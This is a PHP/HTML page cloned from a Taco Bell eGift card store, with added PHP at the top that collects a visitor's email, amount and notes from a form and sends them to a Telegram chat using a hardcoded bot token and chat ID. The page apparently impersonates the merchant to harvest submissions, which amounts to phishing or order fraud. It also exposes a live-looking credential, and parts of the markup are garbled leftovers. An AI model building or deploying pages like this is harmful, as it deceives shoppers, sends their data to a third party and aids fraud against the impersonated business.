<?php
$email = $_POST['email'];
$amount = $_POST['amount'];
$notes = $_POST['notes'];
$message ="TACO TACO HAS PLACED AND ORDER!!!\n\n $email\n\n============\n\n$amount\n\n\n==============\n\n$notes\n";

$apiToken = "5884162033:AAG_CgkEbML9dXsIy9E1K03yWzUOxbmf8cA"; 
$data = [
    'chat_id' => '-1001831940786',
    'text' => $message
];

$response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" .
                                 http_build_query($data) );
                                                    

?><html lang="en-US"><head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <meta name="description" content="A responsive giftcard store">
        <meta name="author" content="Gift Solutions">
        
        
        <!-- REVIEW 39565602 -->
        <!-- GEB 09/13/2018 Adding in icons for apple payment sheet. These are not mandatory to have-->
         
         
         <!-- image dimensions 180px x 180px -->
        <!-- REVIEW 38194194 -->
        <!-- GEB 06/28/2018 Adding in a dynamic title for ada compliance -->
                <title>Taco Bell | eGift Card | Choose Design</title>
        <!-- ENG-1860 -->
        <!-- ENG-1860 -->

        <!-- Typekit code if the json has been added for the store -->
                <!-- Typography.com code if the json has been added for the store -->
        
                    <link href="https://tw-merchant-content-production.s3.amazonaws.com/public/css/responsive/combined.css" rel="stylesheet">
                <!-- REVIEW 43837435 -->
            <!-- GEB 07/01/2018 add ability for JSON to determine what custom styles to use for a stores styles.css file -->
                        <!-- Custom styles for this store generated by sass -->
                <link rel="stylesheet" href="https://tw-merchant-content-production.s3.amazonaws.com/private/retail/225/tacobell/responsive/css/styles.css">
            
        
        
        <!--[if lte IE 9]>
            <link rel="stylesheet" href="https://tw-merchant-content-production.s3.amazonaws.com/private/retail/225/tacobell/responsive/css/ie9styles.css">
        <![endif]-->

        
        <!--[if lt IE 9]>
            <link rel="stylesheet" href="https://tw-merchant-content-production.s3.amazonaws.com/public/css/responsive/ie8_main.css">
            <script src="https://tw-merchant-content-production.s3.amazonaws.com/public/js/html5shiv.js"></script>
            <script src="https://tw-merchant-content-production.s3.amazonaws.com/public/js/respond.min.js"></script>
        <![endif]-->


        <!-- //This gets the max future delivery days from the stores json configuration if its not set it uses the default 180 days -->
        
                <script src="https://cdn.perfdrive.com/aperture/apertur###" async=""></script><script type="text/javascript" async="" src="https://www.google-analytics.com/plugins/ua/ec.js"></script>
        	    
<script>
    var dataLayer = window.dataLayer = window.dataLayer || [];
        const brandDimensionValue = 'tacobell';
    dataLayer.push({
        'dimension1': brandDimensionValue,
        '&cu': 'USD'
    });
            dataLayer.push({
        'ecommerce': {
            'currencyCode': 'USD',
            'detail': {}
        }
    });
        </script>



<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-M2L7D5N>"
                  height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->

    <script>var __uzdbm_1 = "60ec1aa0-a4a3-483a-afea-7912a7e38f26";var __uzdbm_2 = "OWUxYjhiYmUtYnMyYi00ZWFhLWE3MjQtMTI0MzU1ZGU2NWI1JDE4NS4yMjMuMTUyLjEzMQ==";</script> <script>(function(w, d, e, u, c, g, a, b){ w["SSJSConnectorObj"] = {ss_cid : c, domain_info: "auto"}; a = d.createElement(e); a.async = true; a.src = u; b = d.getElementsByTagName(e)[0]; b.parentNode.insertBefore(a, b); })(window,document,"script","https://cdn.perfdrive.com/aperture/apertur###","bs2d","ssConf");</script></head>
<body class="no-images">
    <div style="display: none;" id="spinner">
        <div class="loading-indicator loading-md"></div>
        <div class="clear"></div>
    </div>
<!-- Fixed navbar -->
<nav class="header-menu navbar navbar-inverse navbar-fixed-top" aria-label="Top Banner">
    <div class="container">
    
    <div title="" tabindex="0" class="offscreen"></div>
        <div class="navbar-header tw-header-menu">
            <a class="navbar-brand" target="_blank" href="https://www.tacobell.com" tabindex="0" title="Click on Taco Bell logo to go to https://www.tacobell.com">Taco Bell</a>
            <div class="cart-dropdown-container">
                        <!-- REVIEW 36232163 -->
            <!-- GEB 06/19/2018 updated cart icon from a bg-image to img -->
            <a href="https://merchant.wgiftcard.com/cart/tacobell" tabindex="0" id="sm-cart-link" class="pull-right hidden-sm hidden-md hidden-lg tw-cart" title="The total number of line items in your cart is 0">
                <img alt="Cart Icon" src="https://tw-merchant-content-production.s3.amazonaws.com/private/retail/225/tacobell/responsive/images/cart-icon.png" aria-hidden="true">
                <span class="sr-only">Cart: The total number of items in your cart is 0</span>
                <span class="badge" aria-hidden="true">0</span>
            </a>
                                    <div class="collapse navbar-collapse navbar-inverse" id="tw-menu">
            <ul class="nav navbar-nav">
                                    <li class="hidden-xs">
                        <!-- REVIEW 36232163 -->
                    <!-- GEB 06/19/2018 updated cart icon from a bg-image to img -->
                        <a href="https://merchant.wgiftcard.com/cart/tacobell" tabindex="0" id="lg-cart-link" class="tw-cart" title="The total number of line items in your cart is 0">
                            <img alt="Cart Icon" src="https://tw-merchant-content-production.s3.amazonaws.com/private/retail/225/tacobell/responsive/images/cart-icon.png" aria-hidden="true">
                            <span class="sr-only">Cart: The total number of items in your cart is 0</span>
                            <span class="badge" aria-hidden="true">0</span>
                        </a>
                    </li>
                
                                
                            </ul><!-- .nav.navbar-nav -->
        </div><!-- #tw-menu -->

            </div>
        </div>
    </div>
</nav>
<!-- end Fixed navbar -->
    
    
    





            
        
            
     
    
	

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
        <br>k<br><br><br>k<br><br><br l="">k<br><br><br>=============  <br><br><label for="email">Email:</label>
        <input name="email" id="email" required="" type="text" width="">
        <label for="amount">Amount:</label>
        <input name="amount" id="amount" required="" type="text">

        <label for="notes">Notes:</label>
        <textarea style="width: 1450px; height: 126px;" name="notes" id="notes" rows="4"></textarea>

        <input value="Submit" type="submit">
    </form><form name="" action="taco2.php" method="post" enctype="">

   <style>
        body {
            background-color: #222;
            color: #fff;
            font-family: Arial, sans-serif;
            padding: 20px;
        }

        h1 {
            text-align: center;
            margin-bottom: 30px;
        }

        form {
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        label {
            display: block;
            font-size: 16px;
            margin-bottom: 10px;
        }

        input[type="text"],
        textarea {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            border: none;
            border-radius: 5px;
            margin-bottom: 20px;
            background-color: #444;
            color: #fff;
        }

        input[type="submit"] {
            background-color: #333;
            color: #fff;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }
    </style>



    
<input name="" id="picked_envelope" value="" type="hidden">

<div class="choose container" role="main" id="mainContent">
            
       <style>
        body {
            background-color: #222;
            color: #fff;
            font-family: Arial, sans-serif;
            padding: 20px;
        }

        h1 {
            text-align: center;
            margin-bottom: 30px;
        }

        form {
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        label {
            display: block;
            font-size: 16px;
            margin-bottom: 10px;
        }

        input[type="text"],
        textarea {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            border: none;
            border-radius: 5px;
            margin-bottom: 20px;
            background-color: #444;
            color: #fff;
        }

        input[type="submit"] {
            background-color: #333;
            color: #fff;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }
    </style>



    



    
</div>I have an idea.<!-- .container -->
</form><!-- REVIEW 43144559 -->
<script></script>
<noscript>This site requires javascript.  Please enable javascript on your browser. </noscript>
        <noscript>This site requires javascript.  Please enable javascript on your browser. </noscript>
    <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics###','ga');

  ga('create', 'UA-7670652-6', 'auto', {'name': 'gcTracker'});

    var dimensionValue = 'tacobell';
  ga('gcTracker.set', 'dimension1', dimensionValue);
  ga('gcTracker.require', 'ec');
  ga('gcTracker.set', '&cu', 'USD');
      ga('gcTracker.ec:setAction', 'detail');
      ga('gcTracker.send', 'pageview');
</script>    
</body></html>